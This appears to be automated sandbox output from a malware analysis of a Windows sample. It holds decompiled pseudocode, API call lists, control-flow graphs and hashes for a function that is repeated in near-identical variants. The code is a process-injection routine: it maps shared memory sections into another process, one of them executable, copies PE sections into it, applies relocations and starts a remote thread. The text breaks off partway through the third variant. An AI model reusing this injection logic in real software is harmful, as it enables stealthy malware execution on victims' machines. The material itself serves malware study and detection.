                                                0x00401841
                                                0x0040184d
                                                0x0040184f
                                                0x00401853
                                                0x00401854
                                                0x0040185a
                                                0x00401864
                                                0x00401864
                                                0x0040185c
                                                0x0040185c
                                                0x0040185c
                                                0x0040186a
                                                0x0040186b
                                                0x00401870
                                                0x0040187e
                                                0x0040187e
                                                0x0040187e
                                                0x00401884
                                                0x00401886
                                                0x00401887
                                                0x0040188b
                                                0x004018f3
                                                0x004018f7
                                                0x00401902
                                                0x00401902
                                                0x00401905
                                                0x00401905
                                                0x00401908
                                                0x00000000
                                                0x00000000
                                                0x0040190a
                                                0x00401914
                                                0x00401919
                                                0x0040191b
                                                0x00401920
                                                0x0040192c
                                                0x0040192c
                                                0x0040192c
                                                0x0040192e
                                                0x0040192e
                                                0x00401932
                                                0x00401939
                                                0x0040193b
                                                0x0040193e
                                                0x0040194e
                                                0x0040188d
                                                0x0040188d
                                                0x00401892
                                                0x00401893
                                                0x004018a9
                                                0x004018b8
                                                0x004018c5
                                                0x004018dc
                                                0x004018ea
                                                0x004018ea
                                                0x0040188b
                                                0x00401797
                                                0x00401775
                                                0x00401744
                                                0x0040167b
                                                0x0040196b
                                                0x00401970
                                                0x00401984
                                                0x004019a2
                                                0x004019b3

                                                APIs
                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401690
                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016BD
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E0
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016FE
                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040173F
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401770
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401792
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.353998046.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_kmxId0uLRn.jbxd
                                                Similarity
                                                • API ID: Section$View$Create$DuplicateObject
                                                • String ID:
                                                • API String ID: 1546783058-0
                                                • Opcode ID: 415a5842a2c5ec0b738834669aaf024952b371ede68f2027b92f6496f3657053
                                                • Instruction ID: 1fcee3e81df0436361f0f1364465162f3818ae34080ff9e07162e38916551545
                                                • Opcode Fuzzy Hash: 415a5842a2c5ec0b738834669aaf024952b371ede68f2027b92f6496f3657053
                                                • Instruction Fuzzy Hash: 8451F8B5900249BBEF209F91CC48FEFBFB8EF85B10F140159FA11BA2A5D6749945CB24
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 317 401613-40162b call 401274 323 401630-401635 317->323 324 40162d 317->324 326 401956-40195e 323->326 327 40163b-40164c 323->327 324->323 326->323 332 401963-4019b3 call 401274 326->332 330 401652-40167b 327->330 331 401954 327->331 330->331 340 401681-401698 NtDuplicateObject 330->340 331->332 340->331 342 40169e-4016c2 NtCreateSection 340->342 343 4016c4-4016e5 NtMapViewOfSection 342->343 344 40171e-401744 NtCreateSection 342->344 343->344 346 4016e7-401703 NtMapViewOfSection 343->346 344->331 347 40174a-40174e 344->347 346->344 349 401705-40171b 346->349 347->331 350 401754-401775 NtMapViewOfSection 347->350 349->344 350->331 352 40177b-401797 NtMapViewOfSection 350->352 352->331 355 40179d call 4017a2 352->355
                                                C-Code - Quality: 59%
                                                			E00401613(void* __ebx, void* __esi, void* __eflags) {
                                                				void* _t85;
                                                				intOrPtr _t88;
                                                				void* _t91;
                                                				intOrPtr _t92;
                                                				struct _GUID _t99;
                                                				struct _GUID _t101;
                                                				PVOID* _t103;
                                                				PVOID* _t105;
                                                				intOrPtr* _t109;
                                                				PVOID* _t122;
                                                				PVOID* _t124;
                                                				intOrPtr _t129;
                                                				void** _t132;
                                                				signed int _t139;
                                                				int _t140;
                                                				void* _t158;
                                                				signed int _t162;
                                                				signed int _t163;
                                                				signed int _t164;
                                                				signed int _t165;
                                                				signed int _t166;
                                                				void* _t167;
                                                				intOrPtr* _t168;
                                                				void* _t171;
                                                				intOrPtr _t181;
                                                				void* _t182;
                                                				void* _t183;
                                                				HANDLE* _t189;
                                                				HANDLE* _t191;
                                                				void* _t196;
                                                				intOrPtr* _t199;
                                                				void* _t202;
                                                				void* _t203;
                                                				intOrPtr* _t205;
                                                				void* _t209;
                                                				long _t224;
                                                
                                                				L00401274(_t85, 0xf1, __esi, __eflags);
                                                				_t129 =  *((intOrPtr*)(_t203 + 8));
                                                				 *((intOrPtr*)(_t203 - 0x34)) = 0;
                                                				if(gs != 0) {
                                                					 *((intOrPtr*)(_t203 - 0x34)) =  *((intOrPtr*)(_t203 - 0x34)) + 1;
                                                				}
                                                				while(1) {
                                                					_t88 =  *((intOrPtr*)(_t129 + 0x48))();
                                                					if(_t88 != 0) {
                                                						break;
                                                					}
                                                					 *((intOrPtr*)(_t129 + 0x1c))(0x3e8);
                                                				}
                                                				 *((intOrPtr*)(_t203 - 0x5c)) = _t88;
                                                				_t189 = _t203 - 0x60;
                                                				 *_t189 = 0;
                                                				 *((intOrPtr*)(_t129 + 0x4c))(_t88, _t189);
                                                				_t91 =  *_t189;
                                                				if(_t91 != 0) {
                                                					_t132 = _t203 - 0x30;
                                                					 *_t132 = _t91;
                                                					_t132[1] = 0;
                                                					_t189 = _t203 - 0x28;
                                                					 *((intOrPtr*)(_t129 + 0x10))(_t189, 0x18);
                                                					 *_t189 = 0x18;
                                                					_push(_t203 - 0x30);
                                                					_push(_t189);
                                                					_push(0x40);
                                                					_push(_t203 - 0x10);
                                                					if( *((intOrPtr*)(_t129 + 0x70))() == 0 && NtDuplicateObject( *(_t203 - 0x10), 0xffffffff, 0xffffffff, _t203 - 0xc, 0, 0, 2) == 0) {
                                                						 *((intOrPtr*)(_t203 - 8)) = 0;
                                                						_t99 = _t203 - 0x50;
                                                						 *((intOrPtr*)(_t99 + 4)) = 0;
                                                						 *_t99 = 0x5000;
                                                						_t191 = _t203 - 0x54;
                                                						if(NtCreateSection(_t191, 6, 0, _t99, 4, 0x8000000, 0) == 0) {
                                                							 *_t25 =  *(_t203 - 0x50);
                                                							_t122 = _t203 - 0x44;
                                                							 *_t122 = 0;
                                                							if(NtMapViewOfSection( *_t191, 0xffffffff, _t122, 0, 0, 0, _t203 - 0x38, 1, 0, 4) == 0) {
                                                								_t124 = _t203 - 0x3c;
                                                								 *_t124 = 0;
                                                								if(NtMapViewOfSection( *_t191,  *(_t203 - 0xc), _t124, 0, 0, 0, _t203 - 0x38, 1, 0, 4) == 0) {
                                                									_t202 =  *(_t203 - 0x44);
                                                									 *((intOrPtr*)(_t129 + 0x20))(0, _t202, 0x104);
                                                									 *((intOrPtr*)(_t202 + 0x208)) =  *((intOrPtr*)(_t203 + 0x14));
                                                									 *((intOrPtr*)(_t203 - 8)) =  *((intOrPtr*)(_t203 - 8)) + 1;
                                                								}
                                                							}
                                                						}
                                                						_t101 = _t203 - 0x50;
                                                						 *((intOrPtr*)(_t101 + 4)) = 0;
                                                						 *_t101 =  *((intOrPtr*)(_t203 + 0x10)) + 0x10000;
                                                						_t189 = _t203 - 0x58;
                                                						if(NtCreateSection(_t189, 0xe, 0, _t101, 0x40, 0x8000000, 0) == 0 &&  *((intOrPtr*)(_t203 - 8)) != 0) {
                                                							 *_t46 =  *(_t203 - 0x50);
                                                							_t103 = _t203 - 0x48;
                                                							 *_t103 = 0;
                                                							if(NtMapViewOfSection( *_t189, 0xffffffff, _t103, 0, 0, 0, _t203 - 0x38, 1, 0, 4) == 0) {
                                                								_t105 = _t203 - 0x40;
                                                								 *_t105 = 0;
                                                								_t224 = NtMapViewOfSection( *_t189,  *(_t203 - 0xc), _t105, 0, 0, 0, _t203 - 0x38, 1, 0, 0x20);
                                                								if(_t224 == 0) {
                                                									L18();
                                                									if(_t224 == 0 && _t224 != 0) {
                                                										asm("hlt");
                                                										_push(_t205);
                                                									}
                                                									_push(0x2ea6);
                                                									_t209 = _t205 + 4;
                                                									_t162 = 0x2260;
                                                									_t163 = _t162 << 5;
                                                									_t164 = _t163 + 0x2260;
                                                									asm("lodsb");
                                                									_t165 = _t164;
                                                									asm("loop 0xffffffc4");
                                                									_t166 = _t165 ^ 0xad610a21;
                                                									_t205 = _t209 - _t166;
                                                									_t196 =  *((intOrPtr*)(_t203 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t203 + 0xc))));
                                                									_t139 =  *(_t196 + 6) & 0x0000ffff;
                                                									_push(_t196);
                                                									_t167 = _t196;
                                                									if( *((intOrPtr*)(_t203 - 0x34)) == 0) {
                                                										_t168 = _t167 + 0xf8;
                                                										__eflags = _t168;
                                                									} else {
                                                										_t168 = _t167 + 0x108;
                                                									}
                                                									_push(_t139);
                                                									_t140 =  *(_t168 + 0x10);
                                                									if(_t140 != 0) {
                                                										memcpy( *((intOrPtr*)(_t168 + 0xc)) +  *(_t203 - 0x48),  *((intOrPtr*)(_t168 + 0x14)) +  *((intOrPtr*)(_t203 + 0xc)), _t140);
                                                										_t205 = _t205 + 0xc;
                                                									}
                                                									asm("loop 0xffffffe6");
                                                									_pop(_t189);
                                                									_t228 =  *((intOrPtr*)(_t203 - 0x34));
                                                									if( *((intOrPtr*)(_t203 - 0x34)) == 0) {
                                                										_push(_t189);
                                                										_t171 = _t189[0xd] -  *(_t203 - 0x40);
                                                										_t199 = _t189[0x28] +  *(_t203 - 0x48);
                                                										__eflags = _t199;
                                                										while(1) {
                                                											__eflags =  *_t199;
                                                											if( *_t199 == 0) {
                                                												break;
                                                											}
                                                											_t181 =  *_t199;
                                                											_t199 = _t199 + 8;
                                                											asm("lodsw");
                                                											__eflags = 0;
                                                											if(0 != 0) {
                                                												 *0x00000000 =  *0x00000000 - _t171;
                                                												__eflags =  *((intOrPtr*)( *(_t203 - 0x48) + 0 + _t181));
                                                											}
                                                											asm("loop 0xffffffe9");
                                                										}
                                                										_pop(_t189);
                                                										__eflags = 0;
                                                										_t109 = _t203 - 4;
                                                										 *_t109 = 0;
                                                										 *((intOrPtr*)(_t129 + 0x98))( *(_t203 - 0xc), 0, 0, 0, 0, 0, _t189[0xa] +  *(_t203 - 0x40),  *(_t203 - 0x3c), _t109, 0);
                                                									} else {
                                                										L51();
                                                										_pop(_t182);
                                                										_t183 = _t182 - 0x1892;
                                                										 *((intOrPtr*)(_t183 + 0x18c6)) = _t183 + 0x304c;
                                                										L004012E3(_t129, _t228);
                                                										0x33(_t183 + 0x304c, 0x1ad);
                                                										 *((intOrPtr*)(_t183 + 0x18eb)) = _t183 + 0x309c;
                                                										0x33();
                                                									}
                                                								}
                                                							}
                                                						}
                                                					}
                                                				}
                                                				_push(0x161d);
                                                				_t92 =  *_t205;
                                                				_push(0x392);
                                                				_t158 = 0xf1;
                                                				return L00401274(_t92, _t158, _t189, _t228);
                                                			}







































                                                0x00401618
                                                0x0040161d
                                                0x00401622
                                                0x0040162b
                                                0x0040162d
                                                0x0040162d
                                                0x00401630
                                                0x00401630
                                                0x00401635
                                                0x00000000
                                                0x00000000
                                                0x0040195b
                                                0x0040195b
                                                0x0040163b
                                                0x0040163e
                                                0x00401641
                                                0x00401645
                                                0x00401648
                                                0x0040164c
                                                0x00401652
                                                0x00401655
                                                0x00401657
                                                0x0040165a
                                                0x00401660
                                                0x00401663
                                                0x00401671
                                                0x00401672
                                                0x00401673
                                                0x00401675
                                                0x0040167b
                                                0x0040169e
                                                0x004016a1
                                                0x004016a4
                                                0x004016a7
                                                0x004016ad
                                                0x004016c2
                                                0x004016c7
                                                0x004016ca
                                                0x004016cd
                                                0x004016e5
                                                0x004016e7
                                                0x004016ea
                                                0x00401703
                                                0x00401705
                                                0x0040170f
                                                0x00401715
                                                0x0040171b
                                                0x0040171b
                                                0x00401703
                                                0x004016e5
                                                0x0040171e
                                                0x0040172a
                                                0x0040172d
                                                0x0040172f
                                                0x00401744
                                                0x00401757
                                                0x0040175a
                                                0x0040175d
                                                0x00401775
                                                0x0040177b
                                                0x0040177e
                                                0x00401795
                                                0x00401797
                                                0x0040179d
                                                0x004017a2
                                                0x004017a6
                                                0x004017a7
                                                0x004017a7
                                                0x004017ce
                                                0x004017d6
                                                0x004017fd
                                                0x00401809
                                                0x00401813
                                                0x00401822
                                                0x0040182a
                                                0x0040182f
                                                0x00401838
                                                0x00401841
                                                0x0040184d
                                                0x0040184f
                                                0x00401853
                                                0x00401854
                                                0x0040185a
                                                0x00401864
                                                0x00401864
                                                0x0040185c
                                                0x0040185c
                                                0x0040185c
                                                0x0040186a
                                                0x0040186b
                                                0x00401870
                                                0x0040187e
                                                0x0040187e
                                                0x0040187e
                                                0x00401884
                                                0x00401886
                                                0x00401887
                                                0x0040188b
                                                0x004018f3
                                                0x004018f7
                                                0x00401902
                                                0x00401902
                                                0x00401905
                                                0x00401905
                                                0x00401908
                                                0x00000000
                                                0x00000000
                                                0x0040190a
                                                0x00401914
                                                0x00401919
                                                0x0040191b
                                                0x00401920
                                                0x0040192c
                                                0x0040192c
                                                0x0040192c
                                                0x0040192e
                                                0x0040192e
                                                0x00401932
                                                0x00401939
                                                0x0040193b
                                                0x0040193e
                                                0x0040194e
                                                0x0040188d
                                                0x0040188d
                                                0x00401892
                                                0x00401893
                                                0x004018a9
                                                0x004018b8
                                                0x004018c5
                                                0x004018dc
                                                0x004018ea
                                                0x004018ea
                                                0x0040188b
                                                0x00401797
                                                0x00401775
                                                0x00401744
                                                0x0040167b
                                                0x0040196b
                                                0x00401970
                                                0x00401984
                                                0x004019a2
                                                0x004019b3

                                                APIs
                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401690
                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016BD
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E0
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016FE
                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040173F
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401770
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401792
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.353998046.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_kmxId0uLRn.jbxd
                                                Similarity
                                                • API ID: Section$View$Create$DuplicateObject
                                                • String ID:
                                                • API String ID: 1546783058-0
                                                • Opcode ID: 22a0d11da6358484d5fb3989fe7d62fe56c3f1842a9ccbaabd161204e5d78bb4
                                                • Instruction ID: d304ef28c580210a7a0f2ed53d1cda2a55b28a26347542abe822579cf832a140
                                                • Opcode Fuzzy Hash: 22a0d11da6358484d5fb3989fe7d62fe56c3f1842a9ccbaabd161204e5d78bb4
                                                • Instruction Fuzzy Hash: 5E51F6B5900249BBEF209F91CC48FEBBBB8EF85B10F100159FA11BA2A5D6749945CB24
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 358 401609-40162b call 401274 362 401630-401635 358->362 363 40162d 358->363 365 401956-40195e 362->365 366 40163b-40164c 362->366 363->362 365->362 371 401963-4019b3 call 401274 365->371 369 401652-40167b 366->369 370 401954 366->370 369->370 379 401681-401698 NtDuplicateObject 369->379 370->371 379->370 381 40169e-4016c2 NtCreateSection 379->381 382 4016c4-4016e5 NtMapViewOfSection 381->382 383 40171e-401744 NtCreateSection 381->383 382->383 385 4016e7-401703 NtMapViewOfSection 382->385 383->370 386 40174a-40174e 383->386 385->383 388 401705-40171b 385->388 386->370 389 401754-401775 NtMapViewOfSection 386->389 388->383 389->370 391 40177b-401797 NtMapViewOfSection 389->391 391->370 394 40179d call 4017a2 391->394
                                                C-Code - Quality: 59%
                                                			E00401609(void* __esi) {
                                                				void* _t86;
                                                				intOrPtr _t89;
                                                				void* _t92;
                                                				void* _t93;
                                                				struct _GUID _t100;
                                                				struct _GUID _t102;
                                                				PVOID* _t104;
                                                				PVOID* _t106;
                                                				intOrPtr* _t110;
                                                				PVOID* _t123;
                                                				PVOID* _t125;
                                                				intOrPtr _t129;
                                                				void** _t132;
                                                				signed int _t139;
                                                				int _t140;
                                                				void* _t157;
                                                				signed int _t161;
                                                				signed int _t162;
                                                				signed int _t163;
                                                				signed int _t164;
                                                				signed int _t165;
                                                				void* _t166;
                                                				intOrPtr* _t167;
                                                				void* _t170;
                                                				intOrPtr _t180;
                                                				void* _t181;
                                                				void* _t182;
                                                				HANDLE* _t188;
                                                				HANDLE* _t190;
                                                				void* _t195;
                                                				intOrPtr* _t198;
                                                				void* _t201;
                                                				void* _t202;
                                                				signed int _t204;
                                                				signed int _t205;
                                                				void* _t209;
                                                				signed int _t210;
                                                				long _t224;
                                                
                                                				_t205 = _t204 |  *(_t202 + 0xf1baef);
                                                				_t210 = _t205;
                                                				L00401274(_t86, 0xf1, __esi, _t210);
                                                				_t129 =  *((intOrPtr*)(_t202 + 8));
                                                				 *((intOrPtr*)(_t202 - 0x34)) = 0;
                                                				if(gs != 0) {
                                                					 *((intOrPtr*)(_t202 - 0x34)) =  *((intOrPtr*)(_t202 - 0x34)) + 1;
                                                				}
                                                				while(1) {
                                                					_t89 =  *((intOrPtr*)(_t129 + 0x48))();
                                                					if(_t89 != 0) {
                                                						break;
                                                					}
                                                					 *((intOrPtr*)(_t129 + 0x1c))(0x3e8);
                                                				}
                                                				 *((intOrPtr*)(_t202 - 0x5c)) = _t89;
                                                				_t188 = _t202 - 0x60;
                                                				 *_t188 = 0;
                                                				 *((intOrPtr*)(_t129 + 0x4c))(_t89, _t188);
                                                				_t92 =  *_t188;
                                                				if(_t92 != 0) {
                                                					_t132 = _t202 - 0x30;
                                                					 *_t132 = _t92;
                                                					_t132[1] = 0;
                                                					_t188 = _t202 - 0x28;
                                                					 *((intOrPtr*)(_t129 + 0x10))(_t188, 0x18);
                                                					 *_t188 = 0x18;
                                                					_push(_t202 - 0x30);
                                                					_push(_t188);
                                                					_push(0x40);
                                                					_push(_t202 - 0x10);
                                                					if( *((intOrPtr*)(_t129 + 0x70))() == 0 && NtDuplicateObject( *(_t202 - 0x10), 0xffffffff, 0xffffffff, _t202 - 0xc, 0, 0, 2) == 0) {
                                                						 *((intOrPtr*)(_t202 - 8)) = 0;
                                                						_t100 = _t202 - 0x50;
                                                						 *((intOrPtr*)(_t100 + 4)) = 0;
                                                						 *_t100 = 0x5000;
                                                						_t190 = _t202 - 0x54;
                                                						if(NtCreateSection(_t190, 6, 0, _t100, 4, 0x8000000, 0) == 0) {
                                                							 *_t26 =  *(_t202 - 0x50);
                                                							_t123 = _t202 - 0x44;
                                                							 *_t123 = 0;
                                                							if(NtMapViewOfSection( *_t190, 0xffffffff, _t123, 0, 0, 0, _t202 - 0x38, 1, 0, 4) == 0) {
                                                								_t125 = _t202 - 0x3c;
                                                								 *_t125 = 0;
                                                								if(NtMapViewOfSection( *_t190,  *(_t202 - 0xc), _t125, 0, 0, 0, _t202 - 0x38, 1, 0, 4) == 0) {
                                                									_t201 =  *(_t202 - 0x44);
                                                									 *((intOrPtr*)(_t129 + 0x20))(0, _t201, 0x104);
                                                									 *((intOrPtr*)(_t201 + 0x208)) =  *((intOrPtr*)(_t202 + 0x14));
                                                									 *((intOrPtr*)(_t202 - 8)) =  *((intOrPtr*)(_t202 - 8)) + 1;
                                                								}
                                                							}
                                                						}
                                                						_t102 = _t202 - 0x50;
                                                						 *((intOrPtr*)(_t102 + 4)) = 0;
                                                						 *_t102 =  *((intOrPtr*)(_t202 + 0x10)) + 0x10000;
                                                						_t188 = _t202 - 0x58;
                                                						if(NtCreateSection(_t188, 0xe, 0, _t102, 0x40, 0x8000000, 0) == 0 &&  *((intOrPtr*)(_t202 - 8)) != 0) {
                                                							 *_t47 =  *(_t202 - 0x50);
                                                							_t104 = _t202 - 0x48;
                                                							 *_t104 = 0;
                                                							if(NtMapViewOfSection( *_t188, 0xffffffff, _t104, 0, 0, 0, _t202 - 0x38, 1, 0, 4) == 0) {
                                                								_t106 = _t202 - 0x40;
                                                								 *_t106 = 0;
                                                								_t224 = NtMapViewOfSection( *_t188,  *(_t202 - 0xc), _t106, 0, 0, 0, _t202 - 0x38, 1, 0, 0x20);
                                                								if(_t224 == 0) {
                                                									L17();
                                                									if(_t224 == 0 && _t224 != 0) {
                                                										asm("hlt");
                                                										_push(_t205);
                                                									}
                                                									_push(0x2ea6);
                                                									_t209 = _t205 + 4;
                                                									_t161 = 0x2260;
                                                									_t162 = _t161 << 5;
                                                									_t163 = _t162 + 0x2260;
                                                									asm("lodsb");
                                                									_t164 = _t163;
                                                									asm("loop 0xffffffc4");
                                                									_t165 = _t164 ^ 0xad610a21;
                                                									_t205 = _t209 - _t165;
                                                									_t195 =  *((intOrPtr*)(_t202 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t202 + 0xc))));
                                                									_t139 =  *(_t195 + 6) & 0x0000ffff;
                                                									_push(_t195);
                                                									_t166 = _t195;
                                                									if( *((intOrPtr*)(_t202 - 0x34)) == 0) {
                                                										_t167 = _t166 + 0xf8;
                                                										__eflags = _t167;
                                                									} else {
                                                										_t167 = _t166 + 0x108;
                                                									}
                                                									_push(_t139);
                                                									_t140 =  *(_t167 + 0x10);
                                                									if(_t140 != 0) {
                                                										memcpy( *((intOrPtr*)(_t167 + 0xc)) +  *(_t202 - 0x48),  *((intOrPtr*)(_t167 + 0x14)) +  *((intOrPtr*)(_t202 + 0xc)), _t140);
                                                										_t205 = _t205 + 0xc;
                                                									}
                                                									asm("loop 0xffffffe6");
                                                									_pop(_t188);
                                                									_t228 =  *((intOrPtr*)(_t202 - 0x34));
                                                									if( *((intOrPtr*)(_t202 - 0x34)) == 0) {
                                                										_push(_t188);
                                                										_t170 = _t188[0xd] -  *(_t202 - 0x40);
                                                										_t198 = _t188[0x28] +  *(_t202 - 0x48);
                                                										__eflags = _t198;
                                                										while(1) {
                                                											__eflags =  *_t198;
                                                											if( *_t198 == 0) {
                                                												break;
                                                											}
                                                											_t180 =  *_t198;
                                                											_t198 = _t198 + 8;
                                                											asm("lodsw");
                                                											__eflags = 0;
                                                											if(0 != 0) {
                                                												 *0x00000000 =  *0x00000000 - _t170;
                                                												__eflags =  *((intOrPtr*)( *(_t202 - 0x48) + 0 + _t180));
                                                											}
                                                											asm("loop 0xffffffe9");
                                                										}
                                                										_pop(_t188);
                                                										__eflags = 0;
                                                										_t110 = _t202 - 4;
                                                										 *_t110 = 0;
                                                										 *((intOrPtr*)(_t129 + 0x98))( *(_t202 - 0xc), 0, 0, 0, 0, 0, _t188[0xa] +  *(_t202 - 0x40),  *(_t202 - 0x3c), _t110, 0);
                                                									} else {
                                                										L50();
                                                										_pop(_t181);
                                                										_t182 = _t181 - 0x1892;
                                                										 *((intOrPtr*)(_t182 + 0x18c6)) = _t182 + 0x304c;
                                                										L004012E3(_t129, _t228);
                                                										0x33(_t182 + 0x304c, 0x1ad);
                                                										 *((intOrPtr*)(_t182 + 0x18eb)) = _t182 + 0x309c;
                                                										0x33();
                                                									}
                                                								}
                                                							}
                                                						}
                                                					}
                                                				}
                                                				_push(0x161d);
                                                				_t93 =  *_t205;
                                                				_push(0x392);
                                                				_t157 = 0xf1;
                                                				return L00401274(_t93, _t157, _t188, _t228);
                                                			}









































                                                0x00401609
                                                0x00401609
                                                0x00401618
                                                0x0040161d
                                                0x00401622
                                                0x0040162b
                                                0x0040162d
                                                0x0040162d
                                                0x00401630
                                                0x00401630
                                                0x00401635
                                                0x00000000
                                                0x00000000
                                                0x0040195b
                                                0x0040195b
                                                0x0040163b
                                                0x0040163e
                                                0x00401641
                                                0x00401645
                                                0x00401648
                                                0x0040164c
                                                0x00401652
                                                0x00401655
                                                0x00401657
                                                0x0040165a
                                                0x00401660
                                                0x00401663
                                                0x00401671
                                                0x00401672
                                                0x00401673
                                                0x00401675
                                                0x0040167b
                                                0x0040169e
                                                0x004016a1
                                                0x004016a4
                                                0x004016a7
                                                0x004016ad
                                                0x004016c2
                                                0x004016c7
                                                0x004016ca
                                                0x004016cd
                                                0x004016e5
                                                0x004016e7
                                                0x004016ea
                                                0x00401703
                                                0x00401705
                                                0x0040170f
                                                0x00401715
                                                0x0040171b
                                                0x0040171b
                                                0x00401703
                                                0x004016e5
                                                0x0040171e
                                                0x0040172a
                                                0x0040172d
                                                0x0040172f
                                                0x00401744
                                                0x00401757
                                                0x0040175a
                                                0x0040175d
                                                0x00401775
                                                0x0040177b
                                                0x0040177e
                                                0x00401795
                                                0x00401797
                                                0x0040179d
                                                0x004017a2
                                                0x004017a6
                                                0x004017a7
                                                0x004017a7
                                                0x004017ce
                                                0x004017d6
                                                0x004017fd
                                                0x00401809
                                                0x00401813
                                                0x00401822
                                                0x0040182a
                                                0x0040182f
                                                0x00401838
                                                0x00401841
                                                0x0040184d
                                                0x0040184f
                                                0x00401853
                                                0x00401854
                                                0x0040185a
                                                0x00401864
                                                0x00401864
                                                0x0040185c
                                                0x0040185c
                                                0x0040185c
                                                0x0040186a
                                                0x0040186b
                                                0x00401870
                                                0x0040187e
                                                0x0040187e
                                                0x0040187e
                                                0x00401884
                                                0x00401886
                                                0x00401887
                                                0x0040188b
                                                0x004018f3
                                                0x004018f7
                                                0x00401902
                                                0x00401902
                                                0x00401905
                                                0x00401905
                                                0x00401908
                                                0x00000000
                                                0x00000000
                                                0x0040190a
                                                0x00401914
                                                0x00401919
                                                0x0040191b
                                                0x00401920
                                                0x0040192c
                                                0x0040192c
                                                0x0040192c
                                                0x0040192e
                                                0x0040192e
                                                0x00401932
                                                0x00401939
                                                0x0040193b
                                                0x0040193e
                                                0x0040194e
                                                0x0040188d
                                                0x0040188d
                                                0x00401892
                                                0x00401893
                                                0x004018a9
                                                0x004018b8
                                                0x004018c5
                                                0x004018dc
                                                0x004018ea
                                                0x004018ea
                                                0x0040188b
                                                0x00401797
                                                0x00401775
                                                0x00401744
                                                0x0040167b
                                                0x0040196b
                                                0x00401970
                                                0x00401984
                                                0x004019a2
                                                0x004019b3

                                                APIs
                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401690
                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016BD
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E0
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016FE
                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040173F
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401770
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401792
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.353998046.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_kmxId0uLRn.jbxd
                                                Similarity
                                                • API ID: Section$View$Create$DuplicateObject
                                                • String ID:
                                                • API String ID: 1546783058-0
                                                • Opcode ID: fb4e74caaccc1c4ceb1dfab7c5280715ca441d32855fb4a2f95dbb33302aedab
                                                • Instruction ID: 24bf3b641dcec1e8044d3b4c6b67768af5ca568568a0cd1df2bbcc1fae36a819
                                                • Opcode Fuzzy Hash: fb4e74caaccc1c4ceb1dfab7c5280715ca441d32855fb4a2f95dbb33302aedab
                                                • Instruction Fuzzy Hash: BD51F7B5900249BFEF209F95CC48FEBBFB8EF85B10F100159FA11BA2A5D6749944CB24
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 397 401617-40162b call 401274 401 401630-401635 397->401 402 40162d 397->402 404 401956-40195e 401->404 405 40163b-40164c 401->405 402->401 404->401 410 401963-4019b3 call 401274 404->410 408 401652-40167b 405->408 409 401954 405->409 408->409 418 401681-401698 NtDuplicateObject 408->418 409->410 418->409 420 40169e-4016c2 NtCreateSection 418->420 421 4016c4-4016e5 NtMapViewOfSection 420->421 422 40171e-401744 NtCreateSection 420->422 421->422 424 4016e7-401703 NtMapViewOfSection 421->424 422->409 425 40174a-40174e 422->425 424->422 427 401705-40171b 424->427 425->409 428 401754-401775 NtMapViewOfSection 425->428 427->422 428->409 430 40177b-401797 NtMapViewOfSection 428->430 430->409 433 40179d call 4017a2 430->433
                                                C-Code - Quality: 58%
                                                			E00401617(void* __edx, void* __esi, void* __eflags) {
                                                				void* _t85;
                                                				intOrPtr _t88;
                                                				void* _t91;
                                                				intOrPtr _t92;
                                                				struct _GUID _t99;
                                                				struct _GUID _t101;
                                                				PVOID* _t103;
                                                				PVOID* _t105;
                                                				intOrPtr* _t109;
